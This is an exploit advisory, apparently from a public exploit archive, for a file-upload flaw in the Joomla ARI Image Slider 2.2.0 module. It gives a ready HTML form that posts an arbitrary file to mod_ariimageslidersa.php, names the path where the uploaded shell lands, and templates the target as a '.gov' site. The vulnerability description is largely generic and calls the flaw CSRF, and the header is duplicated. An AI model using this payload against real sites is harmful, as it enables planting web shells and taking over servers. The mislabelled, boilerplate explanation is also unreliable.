##################################################################################

# Exploit Title : Joomla ARI Image Slider 2.2.0 CSRF Shell Upload
# Author [ Discovered By ] ##################################################################################

# Exploit Title : Joomla ARI Image Slider 2.2.0 CSRF Shell Upload
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 27/03/2019
# Vendor Homepage : ari-soft.com
# Software Download Link : ari-soft.com/Joomla-Components/ARI-Image-Slider/Detailed-product-flyer.html
# Software Information Link : extensions.joomla.org/extension/ari-image-slider/
# Software Affected Version : 2.2.0 and lower versions / Compatible with Joomla 2.x and 3.x
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# Vulnerability Type : CWE-352 [ Cross-Site Request Forgery (CSRF) ]
# PacketStormSecurity : packetstormsecurity.com/files/authors/13968
# CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
# Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos

##################################################################################

# Description about Software :
***************************
ARI Image Slider module is based on Nivo Slider jQuery plugin and provides possibility to create

responsive image slideshow using photos from the selected folders and it is designed for Joomla CMS.

##################################################################################

# Impact :
***********
Joomla ARI Image Slider 2.2.0 => The web application does not, or can not, sufficiently

verify whether a well-formed, valid, consistent request was intentionally provided by the user who submitted the request.

When a web server is designed to receive a request from a client without any mechanism for verifying that it was

intentionally sent, then it might be possible for an attacker to trick a client into making an unintentional request to the

web server which will be treated as an authentic request. This can be done via a URL, image load,

XMLHttpRequest, etc. and can result in exposure of data or unintended code execution.

Joomla ARI Image Slider 2.2.0 => is prone to a vulnerability that lets attackers upload arbitrary files.

The issue occurs because the application fails to adequately sanitize user-supplied input.

An attacker may leverage this issue to upload arbitrary files to the affected computer; this can result

in arbitrary code execution within the context of the vulnerable application.

##################################################################################

# Vulnerable File :
****************
/mod_ariimageslidersa.php

# Vulnerability :
**************
/modules/mod_ariimageslidersa/mod_ariimageslidersa.php

# Directory File Path :
*******************
/modules/mod_ariimageslidersa/[YOURSHELLNAME].php

# CSRF Cross Site Request Forgery Exploiter / Shell Upload :
******************************************************
<form enctype="multipart/form-data" action="https://www.[VULNERABLESITE].gov/modules/mod_ariimageslidersa/mod_ariimageslidersa.php"
method="POST"><input type="hidden" name="MAX_FILE_SIZE" value="512000" />Select Your File :
<input name="userfile" type="file" /><input type="submit" value="Upload" /></form>Cyberizm

##################################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team

##################################################################################